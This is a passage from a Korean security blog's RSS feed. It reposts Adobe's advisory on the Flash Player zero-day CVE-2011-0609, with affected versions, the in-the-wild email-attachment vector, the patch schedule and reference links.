&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x04 reference&amp;tools</category>
			<category>BMP</category>
			<category>file format</category>
			<category>GIF</category>
			<category>image file format</category>
			<category>JPEG</category>
			<category>jpg</category>
			<category>png</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/134</guid>
			<comments>http://malwarelab.tistory.com/entry/Image-File-Format-JPEG-GIF-BMP-update-PNG-%EC%B6%94%EA%B0%80#entry134comment</comments>
			<pubDate>Fri, 18 Mar 2011 16:16:46 +0900</pubDate>
		</item>
		<item>
			<title>New Adobe Zero-Day [CVE-2011-0609]</title>
			<link>http://malwarelab.tistory.com/entry/New-Adobe-Zero-Day-CVE-2011-0609</link>
			<description>&lt;br /&gt;
&lt;br /&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile7.uf.tistory.com/original/131DF4554D7E785A1A3479&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile7.uf.tistory.com/image/131DF4554D7E785A1A3479&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;adobe-bug-exploits-vulnerability.jpg&quot; height=&quot;250&quot; width=&quot;250&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;A href=&quot;http://www.adobe.com/support/security/advisories/apsa11-01.html&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;http://www.adobe.com/support/security/advisories/apsa11-01.html&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;SPAN style=&quot;WIDOWS: 2; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; BORDER-COLLAPSE: separate; FONT: medium '맑은 고딕'; WHITE-SPACE: normal; ORPHANS: 2; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-size-adjust: auto; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; -webkit-text-decorations-in-effect: none; -webkit-text-stroke-width: 0px&quot; class=Apple-style-span&gt;&lt;SPAN style=&quot;LINE-HEIGHT: 12px; FONT-FAMILY: Arial, Helvetica, sans-serif; COLOR: rgb(51,51,51); FONT-SIZE: 12px&quot; class=Apple-style-span&gt;
&lt;H3 style=&quot;BORDER-BOTTOM: rgb(203,203,203) 3px solid; PADDING-BOTTOM: 4px; LINE-HEIGHT: 1.455; TEXT-TRANSFORM: uppercase; MARGIN: 0px 0px 0.85em; MIN-HEIGHT: 1em; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; COLOR: rgb(34,34,34); FONT-SIZE: 0.91em; PADDING-TOP: 4px&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;SUMMARY&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;A&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN class=Apple-converted-space&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;A style=&quot;COLOR: rgb(0,68,119); TEXT-DECORATION: none&quot; href=&quot;http://www.adobe.com/support/security/severity_ratings.html&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;critical&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN class=Apple-converted-space&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;vulnerability exists in Adobe Flash Player 10.2.152.33 and earlier versions (Adobe Flash Player 10.2.154.13 and earlier for Chrome users) for Windows, Macintosh, Linux and Solaris operating systems, Adobe Flash Player 10.1.106.16 and earlier versions for Android, and the Authplay.dll component that ships with Adobe Reader and Acrobat X (10.0.1) and earlier 10.x and 9.x versions of Reader and Acrobat for Windows and Macintosh operating systems.&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;This vulnerability (CVE-2011-0609) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being exploited in the wild in&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;FONT color=#e31600&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt; targeted attacks via a Flash (.swf) file embedded in a Microsoft Excel (.xls) file delivered as an email attachment.&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt; At this time, Adobe is not aware of attacks targeting Adobe Reader and Acrobat. Adobe Reader X Protected Mode mitigations would prevent an exploit of this kind from executing.&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;We are in the process of finalizing a fix for the issue and expect to make available an update for Flash Player 10.x and earlier versions for Windows, Macintosh, Linux, Solaris and Android, and an update for Adobe Acrobat X (10.0.1) and earlier 10.x and 9.x versions for Windows and Macintosh, Adobe Reader X (10.0.1) for Macintosh, and Adobe Reader 9.4.2 and earlier 9.x versions during the week of March 21, 2011. Because Adobe Reader X Protected Mode would prevent an exploit of this kind from executing, we are currently planning to address this issue in Adobe Reader X for Windows with the next quarterly security update for Adobe Reader, currently scheduled for June 14, 2011.&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3 style=&quot;BORDER-BOTTOM: rgb(203,203,203) 3px solid; PADDING-BOTTOM: 4px; LINE-HEIGHT: 1.455; TEXT-TRANSFORM: uppercase; MARGIN: 0px 0px 0.85em; MIN-HEIGHT: 1em; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; COLOR: rgb(34,34,34); FONT-SIZE: 0.91em; PADDING-TOP: 4px&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;AFFECTED SOFTWARE VERSIONS&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;UL style=&quot;LINE-HEIGHT: 0; LIST-STYLE-TYPE: disc; MARGIN-TOP: 1em; PADDING-LEFT: 2.5ex; MARGIN-BOTTOM: 1.35em; LETTER-SPACING: -2ex; MARGIN-LEFT: 1ex; WORD-SPACING: -2ex&quot;&gt;
&lt;LI style=&quot;PADDING-BOTTOM: 0.5em; LINE-HEIGHT: 1.25em; LETTER-SPACING: normal; FONT-SIZE: 1em; WORD-SPACING: normal&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Adobe Flash Player 10.2.152.33 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI style=&quot;PADDING-BOTTOM: 0.5em; LINE-HEIGHT: 1.25em; LETTER-SPACING: normal; FONT-SIZE: 1em; WORD-SPACING: normal&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Adobe Flash Player 10.2.154.13 and earlier for Chrome users&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI style=&quot;PADDING-BOTTOM: 0.5em; LINE-HEIGHT: 1.25em; LETTER-SPACING: normal; FONT-SIZE: 1em; WORD-SPACING: normal&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Adobe Flash Player 10.1.106.16 and earlier for Android&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI style=&quot;PADDING-BOTTOM: 0.5em; LINE-HEIGHT: 1.25em; LETTER-SPACING: normal; FONT-SIZE: 1em; WORD-SPACING: normal&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;The Authplay.dll component that ships with Adobe Reader and Acrobat X (10.0.1) and earlier 10.x and 9.x versions for Windows and Macintosh operating systems.&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/LI&gt;&lt;/UL&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;NOTE: Adobe Reader 9.x for UNIX, Adobe Reader for Android, and Adobe Reader and Acrobat 8.x are not affected by this issue.&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3 style=&quot;BORDER-BOTTOM: rgb(203,203,203) 3px solid; PADDING-BOTTOM: 4px; LINE-HEIGHT: 1.455; TEXT-TRANSFORM: uppercase; MARGIN: 0px 0px 0.85em; MIN-HEIGHT: 1em; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; COLOR: rgb(34,34,34); FONT-SIZE: 0.91em; PADDING-TOP: 4px&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;SEVERITY RATING&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Adobe categorizes this as a&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN class=Apple-converted-space&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;A style=&quot;COLOR: rgb(0,68,119); TEXT-DECORATION: none&quot; href=&quot;http://www.adobe.com/support/security/severity_ratings.html&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;critical&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN class=Apple-converted-space&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;issue.&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3 style=&quot;BORDER-BOTTOM: rgb(203,203,203) 3px solid; PADDING-BOTTOM: 4px; LINE-HEIGHT: 1.455; TEXT-TRANSFORM: uppercase; MARGIN: 0px 0px 0.85em; MIN-HEIGHT: 1em; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; COLOR: rgb(34,34,34); FONT-SIZE: 0.91em; PADDING-TOP: 4px&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;DETAILS&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;A&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN class=Apple-converted-space&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;A style=&quot;COLOR: rgb(0,68,119); TEXT-DECORATION: none&quot; href=&quot;http://www.adobe.com/support/security/severity_ratings.html&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;critical&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN class=Apple-converted-space&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;vulnerability exists in Adobe Flash Player 10.2.152.33 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems (Adobe Flash Player 10.2.154.13 and earlier for Chrome users), Adobe Flash Player 10.1.106.16 and earlier versions for Android, and the authplay.dll component that ships with Adobe Reader and Acrobat X (10.0.1) and earlier 10.x and 9.x versions for Windows and Macintosh operating systems.&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;This vulnerability (CVE-2011-0609) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being exploited in the wild in targeted attacks via a Flash (.swf) file embedded in a Microsoft Excel (.xls) file delivered as an email attachment. Adobe is not currently aware of attacks targeting Adobe Reader and Acrobat. Adobe Reader X Protected Mode mitigations would prevent an exploit of this kind from executing.&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;We are in the process of finalizing a fix for the issue and expect to make available an update for Flash Player 10.x and earlier versions for Windows, Macintosh, Linux, Solaris and Android, and an update for Adobe Acrobat X (10.0.1) and earlier 10.x and 9.x versions for Windows and Macintosh, Adobe Reader X (10.0.1) for Macintosh, and Adobe Reader 9.4.2 and earlier 9.x versions during the week of March 21, 2011. Adobe Reader X Protected Mode mitigations would prevent an exploit of this kind from executing. Because Adobe Reader X Protected Mode would prevent an exploit of this kind from executing, we are currently planning to address this issue in Adobe Reader X for Windows with the next quarterly security update for Adobe Reader, currently scheduled for June 14, 2011.&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Adobe Reader 9.x for UNIX, Adobe Reader for Android, and Adobe Reader and Acrobat 8.x are not affected by this issue.&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P style=&quot;PADDING-BOTTOM: 1px; LINE-HEIGHT: 1.462; MARGIN-TOP: 0px; MARGIN-BOTTOM: 1.2em; FONT-SIZE: 1.08em&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Users may monitor the latest information on the Adobe Product Security Incident Response Team blog at http://blogs.adobe.com/psirt or by subscribing to the RSS feed at http://blogs.adobe.com/psirt/atom.xml.&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;Adobe actively shares information about this and other vulnerabilities with partners in the security community to enable them to quickly develop detection and quarantine methods to protect users until a patch is available. As always, Adobe recommends that users follow security best practices by keeping their anti-malware software and definitions up to date.&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/P&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;A href=&quot;http://www.securelist.com/en/blog/6102/New_Adobe_Zero_Day_Under_Attack&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;http://www.securelist.com/en/blog/6102/New_Adobe_Zero_Day_Under_Attack&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;다음주쯤에 패치를 발표한다고 하는군요..&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;br /&gt;&lt;A href=&quot;http://blogs.adobe.com/asset/2011/03/background-on-apsa11-01-patch-schedule.html&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Gulim&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Tahoma&quot;&gt;http://blogs.adobe.com/asset/2011/03/background-on-apsa11-01-patch-schedule.html&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-133-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-133-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-133-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
